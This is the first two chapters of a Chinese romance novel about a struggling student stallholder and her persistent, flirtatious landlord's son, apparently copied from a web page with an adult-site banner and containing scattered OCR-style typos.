返回

大野狼家的小红帽8f7

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com


第一章

飘着绵绵细雨的漫长梅雨季里,某个一直下雨的星期天夜晚,吴晓红扛着一袋装满流行服饰的大包袱,脚步蹒珊地往回家的路上走。

今晚的生意实在是差劲到爆,雨一直哗啦哗啦地下着,逛夜市的人根本就只有小猫两三只,要不是因为逛街的人实在太少,她上个星期到台中天津路批来的衣服早就销售一空了。

她对自己挑衣服的眼光很有自信,每次带回来的货总是很快就被熟客抢购一空,但是……吴晓红抬头仰望着上头那不赏脸的天空,气象报告说两会一直下到星期三,看样子要等到下个星期才有办法将这次的本钱赚回来。

结束了在夜市的摆摊工作之后,她通常会会附近的面摊吃个面,好好犒赏辛苦赚钱的自己,但因为明天有份不交出去就会毕不了业的成本会计报告,再加上身边没有太多的钱可以挥霍,于是她饿着肚子,筋疲力竭地扛着包袱准备回家吃泡面。

快点回去填饱肚皮,之后还有报告要烦恼呢!

吴晓红低头看看腕上的手表,时间是晚上十一点五十分,如果动作快一点的话,凌晨一点半应该就可以上床睡觉了。

明天早上的第一、二堂空堂时间要到图书馆典藏组去,打工排班表这周轮到她跟那个超啰嗦、超会使唤人的黄玉梅组长一起,她可得好好养足精神,要不然是没办法应付黄玉梅组长的。

拐个弯转进通往社区的巷子,前方一对拥抱着亲吻的情侣挡在马路中间,吴晓红眼尖地发现男主角是自己认识的人,她压低了手上的雨伞,侧过身放轻脚步从两人身旁经过。

「啧,野狼这家伙真是有够差劲,这幺不知检点,有必要在飘着细雨的凌晨搂个女人在社区的巷子中亲嘴吗?是要亲给谁看呀?可恶!」咕咕哝哝地念了他几句,吴晓红加快脚步闪身进人社区,后头的绮丽景象她可无心观赏,因为她满脑子都在想房里橱柜中的好吃泡面,还有今天晚上一定得赶出来的毕业报告,其他的她什幺都无法去想了。

可是一直到烧好开水、泡好面,甚至是吃完面了,刚刚看到的那个画面却一直不肯从她的脑海里散去。

「这个可恶的臭野狼,没事总爱说喜欢我。一转眼就交了新的女朋友,哼!

没节操的家伙,乱亲别的女生嘴巴一定会烂掉的……「将空碗拿到厨房去清洗。吴晓红一边挤着洗碗精,一边低声咒骂着那个该死的家伙。

「不要因为自己没享受到,就诅咒我的嘴巴会烂掉,哪!小红,你想不想试试看?跟我接吻很舒服的;保证你的嘴巴不会烂掉的啦!」叶大郎神不知鬼不觉地出现在吴晓红身后;脸上挂着邪恶到不行的窃笑,「不要!」「喷!回答得这幺快,你就不能稍微考虑一下吗?」叶大郎将身体靠在流理台旁,紧贴着吴晓红的身侧小声地告发着;「偷看是一个很糟的习惯,小红。

你在外头看到我不会打声招呼吗?真是没礼貌……「「走开,我很忙,不想理你。」吴晓红将手上洗净的泡面碗甩干,将它收进烘碗机后、便闪身趁过叶大郎离开厨房。

大三时没抽中学校宿舍,所以她在学校附近寻找便宜的出租房屋,叶妈妈怜惜她生活过得非常清苦,又是一个这幺知上进的好孩子,所以将那时刚嫁出去的大女儿的房间,便宜分租了给她。

于是她跟这只「臭野狼」的孽缘也从那个时候开始了。

话说这只臭野狼,仗待着自己长得稍微有些帅气,又能言善道地懂得讨女生欢心,不知道已经踩瞒过多少纯真无知的少女心了,没想到她一住进他家后,他猎艳的目光竟转到她身上来了。

哼她才没那个福气享受他的吻咧!因为她不想自己的嘴巴碰到他之后也跟着烂本「又说忙,你到底有多忙?忙到连谈恋爱的时间都没有吗?为什幺签次都要用这个烂借口来敷衍我」叶大郎追了上去,在楼梯间挡住了吴晓红的去路。「小红,跟我谈恋爱不会花你多少时间的,我一定不会给你负担的……、、……」「够了,同样的话你要我说几次啊?没时间就是没时间;因为我的时间就是金钱,我每天都要打工,假日还要去夜市摆摊,我忙得连功课都没时间写了,这幺忙你要我拿什幺美国时间去谈什幺鬼恋爱?我根本没空,去找刚刚那个女生陪你疯,我还有报告要赶;你别挡着我的路。」吴晓红绕过挡在身前的高大障碍物,逃也似地奔上楼去。

「就知道躲我,到底要让我看着你的背影看到何时?」叶大郎无力地趴在楼梯间的扶手上,他追求女生从来没有吃过这幺多回的闭门羹,从她搬进他们家到现在已经超过一年半了,她前前后后不知拒绝过他几百次,年轻人嘛,一起谈个轻松的恋爱有什幺难的?重点是要看彼此合不合适,没想到她连交往的机会都不肯给他,真的是将他连续几年累积下来的自信心全都给打垮了。

不过他什幺没有,就脸皮最厚,他不死心地跟着追了上去,刚好听见小红「演房门关起来的声音。

叶大郎大跨步走到她房门口,轻声地敲着她的门:「小红,那个女生只是我认识的一个干妹,我跟她之间什幺都没有,刚刚被你撞见的那个吻是她突然间扑上来亲我的,我来不及躲开,所以就被她得逞了,如果让你一生误会的话,我道歉,我以后不会再跟她见面了。」「不用跟我解释,我又不是你的谁,你爱跟谁接吻就去跟谁接吻。」哼!最好吻到他的嘴巴整个都烂掉啦!吴晓红一时之间想不出还有什幺别的诅咒用语,仅是瞪了房门一眼不打算理他,因为她还有会计报告得忙。

「小红,你不要生气、不要不理我啦!明天下课之后我请你看电影好不好?

给我一个机会,我们一起去约个会嘛1「

愈是追不到手,他就愈想要跟她在一起。

叶大郎认识吴晓红这一年半里,也零星地交过几个女朋友,但跟她们在一起不知为何总是感觉不太对,每次跟女朋友分手之后回到家,他就会想起吴晓红,心想如果是跟她在一起的话,也许情况就不会这幺糟糕。

但没有试过,其实谁也不知道结果会怎样,他本人是有很强烈的实验精神啦识不过小红一直不肯给他机会,害他连实验的机会都没有木板门外传来叩叩的敲打声,都已经几点钟了,这家伙还不肯死心走开?

吴晓红愤愤地打开房门,低声警告着他:「不要再来烦我了,你这样子闹等会儿会把叶妈给吵醒的,你没听说她最近睡得很不好吗?还有,我现在是真的很忙,我的成本会计报告今天晚上要是没来得及弄完的话,会被当掉,毕不了业的。」「如果你答应明天下课之后陪我去吃饭、看电影,我就不烦你,马上乖乖地回房去睡觉。」「你想的美!告诉你,没空!」吴晓红当着叶大郎嘻皮笑脸的面将门轻轻关上,要不是顾及夜深了可能会吵到别人,她可能会用力地甩上房门。

「小红……」

「睡你的大头觉去吧!我不想看到你,快滚!」叶大郎在外头低声敲了一会儿门,却一直得不到回应,只好闷闷地回他自己房里去。

平抚完烦闷的情绪之后,吴晓红翻开厚重的教科书,打开桌上电脑的电源,准备开夜车做报告。

「咦?电脑怎幺没办法进人Windows?该不会坏掉了吧?」吴晓红试着关掉电源重新开机,但不管弄几次,电脑荧幕的画面依然停在开机的初始状态,不晓得代表什幺意义的数字和文字一直闪烁着,等了很久很久还是无法顺利开启winaows介面,她愈弄愈急、愈急就愈气,最后甚至气到狂敲电脑的机壳泄忿。

「喂,死电脑,你不要这样对我啦!竟然在这种紧要的时刻挂掉,我还得赶作业耶!你快点打开啦……」电脑要是听得懂她的话就好啰!吴晓红气急败坏地搞了二十分钟之后,还是无法正常开启,最后她只好对电脑投降,另觅出路。

蹑手蹑脚地走到二楼另外一头叶大郎的房门口,吴晓红不是很情愿地敲着门。

「喂,你出来一下好不好?」

「干嘛?」

臭野狼的声音隔着房门听起来有点闷闷的,听到她的叫唤声,他并没有马上出来。才赶他回去一下子而已,他应该不会这幺快就上床睡觉了吧?吴晓红又小声地咚咚敲了房门两下。

「喂,臭野狼,快点开门,你出来一下啦!」

「你不是说不想见我吗?干嘛大半夜又来敲我的门?反悔啦?是不是答应要跟我约会了」慢吞吞地终于开了门,赤裸着上半身的叶大郎倚在门边,低头凝视着吴晓红的双眼闪烁着危险的光芒。

「我电脑好像坏了,来帮我看一下。」吴晓红虽然没有一开始就反驳叶大郎的痴心妄想,但命令的语气还是听得出来,面对他的时候,她的姿态一直都摆的挺高的。

「有事求人时的语气是像你这个样子的吗/叶大郎将门掩上一些,故意张大嘴巴打了个阿欠。」呵……我好困呐,怎幺办?眼睛都快眯上了「喂!」吴晓红懊恼地瞪着他的装模作样。

「我看还是早点睡好!明天早上我第一堂就有课呢!」接着,门几乎要全部掩上了,叶大郎只留了一个小缝,得意地等待着吴晓红的投降。

「你到底帮不帮我!我这个报告真的很重要的……」吴晓红看了看时间,都已经半夜一点了,如果臭野狼搞不定她的电脑的话,她还能去向谁求助呢?

「如果你答应明天放学跟我去约会的话,我就考虑过去帮你修电脑,怎幺样?

一句话,你点头我就去帮你修。」

「你忘了我晚上要打工吗?我是真的没空啊!」吴晓红捺着性子向叶大郎解释,她现在真的很急呀!要是报告做不完的话,明天课堂上可就难看了。

「不答应就算了,我看我还是上床睡觉好了。」「不肯帮忙就算了,啰哩叭嗦一堆,简直浪费我的时间!」吴晓红气极地端了叶大郎房门一脚,此刻她已顾不得是不是会大大声吵醒叶妈妈,因为她真的非常火大。「我去找别人!」这下子换叶大郎慌了。「已经这幺晚了,你还能去找谁帮忙?」「我去找滔滔,哼,不管再晚他都会无条件地帮我,才不像你,连帮个小忙都要求回报。」门「咱」地一声迅速打开了,叶大郎急急忙忙跟在吴晓红的身后追了过去。

「好、好,我帮你看看,马上就帮你修看看,这幺晚了,你就不要出去了。」可恶!哪能让她大半夜出门去找那个混蛋陈滔滔啊?

叶大郎吃味地睨着正准备收拾书本和衣物的吴晓红,她这下要是去了,铁定会弄报告弄到天亮,他才不愿意看到自己喜欢的女人在别的男人住处过夜咧!

「你到底行不行呀?不行的话就别浪费我的时间,我去找滔滔帮忙,他还能帮我打报告咧!」吴晓红整个晚上都处在情绪爆发的状态,尤其看到这只臭野狼嘻皮笑脸的样子,她的火气一直没办法消退。

「行!我怎幺可能会不行?小红,别忘了我是资讯工程系的高材生,电脑的问题有什幺能够难倒我的7」自大的话讲出口之后,叶大郎当然得在吴晓红的面前好好表现一下才行,坐在她的电脑桌前,他敲着键盘检查,三两下就查出电脑挂点的原因。

「电脑中毒了,没办法开机,你的防毒程式有在运作吧?是不是没有定期更新病毒码?还是你乱开什幺不知名的档案4」「我不知道,昨天我用完还好好的,关机的时候也很正常……」「不知道是中了哪一种,上网开防毒程式扫看看好了,你有保留开机片吗?」「开机片是什幺?我没印象,应该是没有。」「那就糟了,不能开机的话,就没办法靠病毒防护程式扫毒了。」「你不是说没什幺问题难得倒你的吗?」眼看着时间一点一滴地流逝,已经累了一整天的吴晓红疲倦地操着眼睛,她好想睡觉,却卡在这份不得不完成的报告上,现在电脑又挂点了,难道老天爷真的在整她吗?

「喂,非战之罪呀!如果你有保留原始开机片的话,我三两下就能帮你弄好,没有的话就只能重灌啦!没有别的办法了。」「重灌?我哪有那个美国时间等重灌?」东西收到一半,吴晓红转身继续收拾着。「我还是去找滔滔好了。」「喂,这幺晚了不准你出去,很危险的。」叶大郎大方地提供她另外一个选择。「我房里的电脑借你打报告吧!放心,我不会待在房里打扰你的,我留在这里帮你重灌电脑,怎幺样?」「不行,你的电脑里面没有我要用的会计系统软体,这样我的报告根本没办法做。」「会计软体?哪一种的?拿光碟来灌进去就可以用啦!这幺重要的会计软体程式光碟你应该有保留吧?」「我找看看……」吴晓红在书桌上翻了一下,凭着印象总算是找到了那张教科书所附送的会计软体光碟。「应该是这个吧!」「有就好办了,我拿去灌进我的电脑里,你就在我房里打报告吧!」总算是化解了危机,叶大郎欢天喜地拉着吴晓红往自个儿房里走去,楼下突然传来母亲的叫声。

「大郎,这幺晚了你们在吵些什幺?还不睡觉吗吗?」「妈,我帮小红赶一份很重要的报告,吵醒你啦?对不起啊……」「开夜车赶报告?小红、大郎,你们肚子会不会饿啊?妈煮消夜给你们吃好不好?」叶母踩着沉重的步伐,上到二楼来关切他们的肚皮。

「听妈,我刚刚吃过泡面了,我不饿。不好意思,我们讲话大大声,吵醒你了,你赶快回去睡吧广「是什幺报告这幺重要啊川。红,你看看你眼下的黑眼圈都给逼出来了,做完了功课就早点睡呀!叶妈看了好心疼呢!」「谢谢叶妈的关心,有电脑可以用的话报告很快就可以打好,我弄完就会马上去睡了……」叶大郎三两下将程式灌进电脑后,搂着母亲离开自己的房间。

「好了啦!妈,我们肚子不饿,你快回房间睡觉吧!走,我们别留在这里打扰小红,她这份报告真的很重要,明天没准时交出去的话会毕不了业的。」被儿子搂着一边往楼下走,叶母一边拍着儿子的手背发问:「小红怎幺在你房里打报告?你们两个该不会……」「小红的电脑中毒,不能用了,但她赶着要做报告,所以我的电脑就让她用啰!妈,你知不知道我刚刚可是费尽了心思,才阻止小红半夜冲出去找那个陈滔滔。」「陈滔滔?谁啊?」「就是那个跟小红合伙摆摊卖衣服的家伙呀!他是小红的同班同学,小红有的时候好依赖他的……」「你这个兔崽子,把人家当情敌是吧?」叶母读出了儿子的心思。「人家有本事让小红觉得可以安心依靠,你咧?一天到晚吊儿郎当的,女朋友一个换过一个,我要是小红的话也不会选你。」「妈,你怎幺可以胳臂向外弯?你应该要挺我才对呀!」「你看看自己,一天到晚嘻皮笑脸的;到底是不是真心喜欢小红还不知道咧!

搞不好你只是一时贪心想跟她玩玩而已,妈是觉得小红配你实在太可惜,我看你就别再纠缠人家了……」「小红一天到晚忙着打工、赚钱,哪有时间谈恋爱?我都不知道被她拒绝过几百次了,就算我是真心想要纠缠她,也得看人家愿不愿意给我机会理我一下啊!」叶大郎感慨万千地轻叹着,饶是他的脸皮再厚,经过这幺多次的拒绝,还是会让他感到伤心难过的,到底要怎幺样才能够突破小红的心防呢?他真的好想跟小红交往喔!

「妈妈教你个绝招,想不想听呀?」

「什幺绝招?快说来听听。」

连泡妞都要靠老妈教?他这几年的道行真的是自修了呀!叶大郎嘿嘿讪笑着,感觉自己有点逊掉了;不过,有绝招的话多听几招来学学也不错。

「小红这孩子性子倔、有骨气,又重情义,只要是对她好的人,她都会永远记在心里,你呀!不要一天到晚逗她、惹她生气,要专心一意地陪在她身边,支持她、关心她,总有一天她会发现你的好。」「等久了就是我的,真有这回事吗?」「你这个笨儿子,追求女孩子一定要有诚意才行,你一天到晚换女朋友。

我要是小红的话,也不愿意选你这个花心大萝卜。「「妈,同样的教训你不要说两次啦!一次我就已经听进心里去了」叶大郎习惯性地嘻皮笑脸了起来。「那些一天到晚被我换掉的女朋友,又不是我主动去追来的,全都是她们倒追我耶!妈,难道这样也算我有嗺吗?」叶母捧着儿子的脸庞大叹:「给你生了张这幺俊俏的脸蛋,到底是幸还是不幸呀?臭小子,别以为自己长得帅,所有女孩子都会来倒贴你,我们家楼上就有一个不甩你的俏姑娘唁!哪,你自己的恋爱,你自己看着办吧!老妈只能给你无限的祝福了。」「谢啦!妈,」叶大郎撒娇地抱紧了母亲。「如果我需要帮忙,给你猛眨眼打Pass的时候,你一定要帮我喔!」「知道了,笨儿子,妈不帮你还能帮谁?」叶母在儿子的簇拥下走进厨房。

「消夜想吃什幺?妈现在给你们煮。」

「下几个水饺垫垫肚子就好了,妈,我不帮你啰!我上楼去替小红处理一下中毒的电脑。」「去吧!等会儿煮好再叫你们下来吃。」「谢谢妈。」

叶大郎转身一溜烟地冲上楼去,马上开始准备施行老妈刚刚传授给他的绝招。

第二章

「来,客人您的珍珠奶茶五杯已经好了,谢谢您,这里有折价卷,欢迎您下次再来光临。」晚间六、七点的下班人潮,使得奶茶小铺里的工读生个个埋头忙了好一阵子,终于可以得空休息的时候,吴晓红顾不得便当放在一旁都快冷掉了,气呼呼地走到离柜台最近的一张桌子去。

「臭野狼,你是不是吃错药了?干嘛赖在这里不走?」「你要打工没空陪我约会,那我就来这里等你、陪你上班呀!怎幺样。是不是很感动啊?「不管引来多少好奇探询的目光都无所谓,叶大郎打算要彻底贯彻老妈教给他的泡妞绝招——就是陪着她、时时刻刻关心她,不管她再怎幺顽固,经过长期抗战,最后胜利一定会属于他的。

「谁要你陪了?我不需要人陪。」

「你不要这幺说嘛!没人陪很孤单的,你不让我陪你,我也会很孤单的。」意识到前面柜台有几个工读生都在看他们这边,别扭的情绪一下子全涌了上来,吴晓红瞪着叶大郎,他的脸皮真的那幺厚吗?

「你快点走,不要坐在这里惹人闲话,小心我拿扫把轰你出去。」「喂,不要这幺绝情好不好?我也是你们店里的客人耶!你看,我有点东西喝、又不是没有付钱……」叶大郎可怜兮兮地端起桌上那杯石榴绿茶,饮料还有七分满耶!他坐在这里也不过才半个多小时而已,她不会真的这幺不近人情要拿扫把轰他出去吧?

吴晓红无可奈何地瞪着叶大郎,最后只能跺脚生气地吐出一句,「哼!客人是吧?随便你好了。」回到休息的位置上后,吴晓红愤愤地打开半冷的便当,有一口没一口地吃着饭,旁边一个跟她比较熟的工读生小惠随即凑过头来打探消息。

「小红姊,他是你男朋友啊?」

「才不是。」

吴晓红用力地咬了一口便当里的冷排骨,把它当那只臭野狼啃,这样心里的气闷才稍稍平息了一些。

「真的吗?那可不可以介绍给我认识?我觉得他长得超帅的说,还带着一点忧郁的气质,我就喜欢这一型的……」「不行!」想也没想就拒绝了小惠的大胆要求,吴晓红转头又瞪了叶大郎一眼,这个家伙真是害人不浅呀!没事摆那种脸出来做什幺?想勾引谁呀?什幺忧郁的气质?

哼!我看是欠攘的气质吧?

「为什幺不行?反正他又不是你的男朋友。」

「拒绝也是为了你好,我不能害你呀!小惠,老实跟你说,那匹臭野狼根本就是个花花公子,他换女朋友的速度就跟……」「有什幺关系?我换男朋友的速度也是出了名的快。小红姊,快帮我介绍一下啦!这样我就不用另外想借口过去钓他了。」小惠掩着嘴轻笑出声。「花花公子型的啊……看他那个样子,家里应该挺有钱的,小红,你一定要帮我介绍啦!我想我跟他一定会很远配的。」「感情又不是在玩游戏,小惠,你就是这种态度,才会气跑大熊哥的,为什幺找男朋友一定要找家里有钱的?他是不是真心诚意地对待你、是不是全心全意地爱你,这点才是最重要的吧?」小惠的背景跟吴晓红很像,年纪轻轻就背负沉重的经济压力,不但得养活自己,打工赚取大学的学费,甚至还要寄钱回去养家,就是因为这一点,吴晓红才这幺疼惜她,把她当成妹妹看待,但是她的金钱观在她交过几个有钱的男朋友之后,就渐渐地改变了。

「大家玩玩嘛!何必认真,反正只要开心就好了。」小惠撇撇唇,完全不将吴晓红的教训听进耳里,迷恋的眼光还是直往叶大郎身上飘。

「至于那个小气鬼大熊呢,小红姊,请你以后别在我的面前提起他了,我只不过是跟他要一条Tiffany的手链当生日礼物而已,他就说我败家,哪有男生像他这幺小气的?「「我看得出来大熊哥他是真的很喜欢你,小惠,你就不要再跟他呕气了,两个人快点和好吧!好不好?「「分就分了,还跟他和好干嘛?像他那种小气的男生,我才不要继续跟他交往咧!「「可是他真的很喜欢你呀……」小惠将头凑在吴晓红耳朵旁讲着悄悄话。「况且,现在出现了新的目标,就是他!」她将吴晓红的脸转到第一桌的方向,再三地恳求着:「小红姊,你快帮我介绍啦俄想要认识他。」「不行,什幺忙我都帮,就这件事不行。」吴晓红断然拒绝了小惠。

「小红姊,你老实跟我说,这个男的你是不是想留起来自己用啊?」小惠拥着吴晓红继续咬耳朵,瞧那男人的眼神整个晚上都黏在小红姊的身上,她不禁有些吃味,在她这个大美女身旁,竟然有男性的目光舍她而盯着别的女生?

「才不是!」

「如果不是的话,那就介绍给我认识嘛!啊!一直忘了问你,小红姊,他跟你到底是什幺关系啊?为什幺一下课就特地跑到我们店里来坐?」「没什幺特别的关系,我分租他们家的空房间,就这样而已。」「什幺?!你跟他住在一起?」小惠放声惊叫,这叫近水楼台吧?我咧,那她还有什幺搞头?

「喂!」住在一起「并不是这样解释的,我只是分租他们家的空房间,又不是跟他同居,我们只是同住一个屋檐下的房东和房客关系而已。」「你对他一点感觉都没有吗?」小惠咄咄逼人地进一步追问。

「……没有。」吴晓红回答得有些迟疑。

「真的没有吗?」

「真的没有啦!」吴晓红火大了,小惠于嘛要这样逼问她,像是审问犯人似的。

「小惠,你想钓他就去钓啦!不要说我偷藏着不肯介绍给你认识,我已经事先警告过你了,这个臭野狼是个花心大萝卜,你要是不怕受伤的话,爱怎样招惹他都随便你啦!」「好。」小惠得逞地微笑着。「你不喜欢他就好,免得我们姊妹俩为了一个男人反目成仇。」看着小惠脸上露出开心的笑容,吴晓红埋怨的眼光只得转向那个一号桌的不速之客,这只该死的臭野狼实在是害人不浅呀,真的烦死人了啦!

连续好几天的晚上吴晓红只要到奶茶小铺打工,叶大郎都跟在她的身边,没想到到了假日,他还是跟着她到夜市去摆摊卖衣服。

「小姐,这件你穿起来很正点耶!再多带一件嘛!便宜你五十块,好不好?」「真的吗?我穿起来真的很好看?」女顾客被哄得笑咪咪的,拿着叶大郎推荐的衣服在自己身上比着。

「对!真的很好看,你就相信我的眼光嘛!绝对不会错的,你看看你。腰是腰、胸是胸,这种衣服只有你这种标准的身材穿才好看啦!」拿着一面镜子在女顾客身前摇来摇去,让她多看看衣服在她身上展示的样子,帅气的叶大郎如此油腔滑调的称赞,简直让客人欢喜地飞上天去了。

「好,就多带这件,这样总共多少?」

「一共是五件,总共是三千八百五十块,哪,刚刚说要便宜你五十块,拿你三千八百块就好。」叶大郎快手快脚地将客人挑的衣服装进精美的提袋里,恭敬地交到笑咪咪付钱的女客人手上。

「谢谢惠顾喔!有空带朋友过来我们摊子看看嘛!下回再替你多留几件漂亮的衣服,带朋友来买的话,我会给你特别的折扣的。」抛了个媚眼过去,叶大郎得意地将赚来的钱收进腰间的霹雳腰袋里。

「没问题,下次我再带朋友过来。」收到帅哥抛过来的媚眼,女客人像是舍不得走般频频朝叶大郎挥手说掰掰。

依依不舍送客的这一幕,让在场的两位真正「老板」看傻了眼。

「红红,你要不要考虑雇用他当我们摊子的超级销售员啊?」陈滔滔赞叹地望着叶大郎(腰袋里的钱),再看看那个走得很慢,像是根本舍不得离开他们摊子的女顾客,精打细算的脑袋瓜开始运作了起来。

如果算时薪给叶大郎的话,虽然说是笔多出来的开支,但搞不好叶大郎会替他们赚回更多的钱呢!

「雇用他?滔滔,你当我疯了啊?我才不要咧!我一看到他就有气,干嘛还要付钱雇用他站在我的面前惹自己生气啊?」吴晓红低头整理一件件被顾客翻开来看的衣服,整齐地叠好之后放回原位,回头又到后面的大袋子里拿出几件衣服放到台子上去补位。

「嗯,说的也是。」陈滔滔支手撑在下巴处,精打细算的脑袋瓜又转了一转。

「不过,就算不花钱雇用他也没关系,就当他是来做白工的,反正,我看他应该是心甘情愿的。」「喂,你们两个会不会太过分了点儿?当我是个没知觉的人吗了」刚刚用去大量口水称赞客人,叶大郎仰头喝了一大口矿泉水,听到他们的对话后,差一点全吐了出来。

「不要生气、千万不要生气,臭野狼,我们这个摊子还得靠你这张能够舌灿莲花的嘴来赚大钱呢!」陈滔滔狗腿地凑上前去,又是按摩、又是擦汗地替叶大郎服务着,知道自己的嘴拙不懂得怎幺抓住女顾客的心理说出称赞的话,现在他们的摊子有了这幺一位超级销售员,往后的业绩一定能长红。

「是谁准你这样叫我的?」

「臭野狼」这三个字可是他的心肝小红的专用词耶!哪时轮到他来用了?

叶大郎斜眯了陈滔滔一眼,对于眼前这位很有可能是情敌的男人可是感冒得很,就算陈滔滔狗腿地替他按摩、擦汗,他也不会放松一丁点儿的戒心。

「我跟着红红叫的嘛……」

眼看着一双卫生眼又朝着自己杀了过来,陈滔滔连忙改了口。「是,大郎哥,您千万不要生气,今晚我们摊子的生意全都要靠您了,请您多多帮忙、多多帮忙。」「哼!这还差不多。」叶大郎骄傲地仰起下巴,摆出他自认为最帅气的笑容,向街上来来往往的女客人招呼着。

「滔滔,你怎幺可以这幺没骨气?」一旁的吴晓红听了他们之间的对话,觉得又是好气又是好笑。「来,加把劲,我们的叫卖一定不会输给他的。」受到鼓励之后,陈滔滔加入了吴晓红大力推销服饰的行列,突然间热络起来的叫卖声,使得来逛夜市的人群驻足围观,人潮愈多,他们的生意就愈好,衣服一件件地顺利卖出去,钞票一把把地塞进腰间的钱袋里,直到时间过了整点,夜市的人潮慢慢散去为止。

「哗,大丰收啊!红红,上个星期没赚到的钱,今天晚上我们全赚回来了。」陈滔滔眉开眼笑地数着腰袋里的现金,这可是他摆摊卖衣服以来单日进帐最高的一个晚上。

「看吧!有我帮你,是不是多赚了很多钱?」完全没将陈滔滔看在眼里,叶大郎缠在吴晓红身边邀功。「我可不做白工,你要请客才行喔!」「喂,我又没求你来帮忙,是你自己要跟着来的,我为什幺要请客?」囫图吞枣地吃过晚餐后,吴晓红就觉得身体不太对劲,再加上一整晚筋疲力尽地嘶喊叫卖,现在的她累得只想回家睡大头觉。

「红红,你别这样,人家大郎哥今晚可是使出了浑身解数帮我们卖衣服,请个客也是应该的。」「好啊!滔滔,那你请他吃消夜,我好累,想回家睡觉了。」「那怎幺行?我才不要跟他去!」叶大郎猛摇着头。「小红,我要你请客啦坏要这幺小气,请我吃碗冰也行啊!」「红红,一起去嘛!就当是庆祝一下。」「走啦!走啦!不会真的连吃碗冰的时间都没有吧?我辛苦了一整个晚上,慰劳我一下也不为过吧?」叶大郎将吴晓红收拾好的布袋背上自己肩头,生怕她真的不留情面迳自跑掉,扛着她的布袋起码有了一些些的保障,起码她不会不顾她的生财工具撇下他而离开。

「走、我知道有一家店,他们的座冰超好吃的,我带你们去。」「我不想吃冰、」吴晓红身体超不舒服的,不晓得是不是前些天一直下两所以受了寒,摆摊的热情一旦消退之后,就感觉头晕晕的,有些头重脚轻。

「红红,不想吃冰也没关系,那边也有现打果汁,或者是茶、咖啡等选择…」「别啰嗦那幺多,店在哪里?快带我们去。」叶大郎使了个眼色给陈滔滔,两人一左一右地将吴晓红挟持而去。

「哼!亏那小子够机灵,懂得快点闪,不当我们的电灯泡。」走在回家的路上,叶大郎配合着吴晓红的步伐与她并肩而行。刚刚在冰果店时。陈滔滔接到一通电话后就神神秘秘地消失了,得到跟吴晓红单独相处的机会,使得叶大郎的疲倦一扫而空,整个人开心不已。

「小红,明天傍晚才开始摆摊,下午我们去约会好不好?就算看场电影也行啊……」由于是并肩走着,叶大郎一直尝试着想要去握吴晓红的手,但都被她巧妙地避了开,不过总是不屈不挠的叶大郎从不感觉气馁,长长的回家路上他不断地尝试,终于惹恼了吴晓红。

「你不要一直这样好不好?」吴晓红将手藏到身后,气恼地瞪着叶大郎。

「你一直缠着我也没用,我现在没时间谈恋爱,到底要我说几遍你才懂啊?」「我也说过很多遍啊!没时间没关系,我等你嘛!不管要我怎幺配合你都可以,我是心甘情愿的。」「你……可恶!」吴晓红简直没办法与他对话,只好加快脚步把他甩在身后,她现在真的好累,唯一想做的事就是快点回家躺上床去睡觉,为什幺这只臭野狼要一直逼她?

其实,她并不是不曾心动,臭野狼最近几天一直陪在她身边,真的是任她呼来唤去、予取予求,除了叫他走这件事他不肯遵从之外,其他所有的要求他几乎都顺着她的意,长时间的相处让她的眼里、心里都慢慢习惯了他的存在,也意识到自己对他并不是真的那幺不在乎。

只是,心动是一回事,她和他之间还是有很多问题存在的。

她扛着沉重的经济压力,为了养活自己还有在乡下独居的年迈外婆,她压缩了所有的空闲时间想办法打工赚钱,实在没办法像时下一般正常的学生,轻松地去享受恋爱的甜蜜滋味。

再加上习惯花心风流的他,真的是能够让自己依靠的人吗?吴晓红实在没办法确认这一点,所以就算自己已经对他动心了,下意识里她还是一直拒绝他的靠近。

「小红,你不要跑啊!小红……」

最后,手还是让他给握住了,而且不管怎幺甩都甩不掉。「放开!臭野狼,你放开啦!」「我不会勉强你的,小红,没时间约会没关系,就算每天只能在一旁陪着你打工也无所谓,只要能看到你、陪在你的身边,我就很满足了。」「你不要这样,我……我真的没办法……」吴晓红挣扎到最后,却被叶大郎紧紧地抱进怀里,疲倦一下子全涌了上来,她偎在他怀中,感觉双腿无力再支撑自己的身体。

叶大郎连忙将背上的大布袋放下,双手紧紧撑住身体往下坠的吴晓红。「怎幺了?小红?你怎幺了?」「我好累、头好痛,我真的很不舒服……」「你不舒服吗?不舒服的话为什幺不早说?」轻抚着她微微发烫的额头,叶大郎开始自责了起来,她身体不适他竟然还强拖着她去吃冰,真是该死!

「都是我不好,硬拉着你去吃冰……小红,下次你要是不舒服的话要马上跟我说啊!来。上来,我背你回家。「还好今晚衣服卖得差不多了,大布袋并不重,背上虽然多了小红的重量,强壮的叶大郎还是游刃有余地将布袋扛在右肩上头。

「发可以走的,你放我下来啦!」

「你不要乱动嘛!这样我很难背的。」叶大郎用劲压住吴晓红的大腿,不管她怎幺扭动都不让她下来。「小红,要回家还有一大段路,刚刚你都没力气站了,哪会有力气走路?让我背你吧!乖。「昏暗的路灯下,他俩长长的影子映在前方的路面上,叶大郎背着吴晓红稳健地一步步往前走着,吴晓红的心情慢慢地放松了下来。

臭野狼,你不要对我那幺好啦……「再这样下去,她一定会沦陷的。

「为什幺?我喜欢你,对你好是应该的啊!」

叶大郎侧着脸往后迎向吴晓红说话时的热切气息,差一点就偷亲到她的脸,但她却快一步地将头移到他另外一边的肩头。

「你干嘛?」吴晓红不满地踢了叶在郎一脚,他吃疼地问哼了一声,顺畅前进的脚步瞬间顿了一下。

「啊,你好狠喔!小红,我辛辛苦苦地背你回家耶!你怎幺忍心踢我?」「谁教你……谁教你那幺不规矩!」不知是生理性发烧的热,还是心理性害羞的热。吴晓红觉得自已的脸好红好红。

「不规矩?有吗?」叶大郎咬着唇小声地抱怨:「想亲你就叫不规矩啊?

怎幺办?我还想对你做更多更邪恶的事耶……「「你敢!」吴晓红气恼地圈紧叶大郎的脖子。「不准你想!」整个身子都紧贴着他,臭野狼这句带有很多暗示的话,让吴晓红窘得不知该如何是好,「想也犯法喔?你真专制。」叶大郎呼吸几口气,继续大跨步地往回家的路上前进。「小红,跟我交往好不好啦?」「不是嫌我专制吗?干嘛要喜欢我?」「没办法啊!都已经先喜欢上你了,才发现你这幺专制的说,你看,我是不是真的好可怜?」「就会说歪理。」接了他肩头一拳,吴晓红轻易地就被他给逗笑了。

「其实,你也喜欢我,对不对」

「我才没有!」

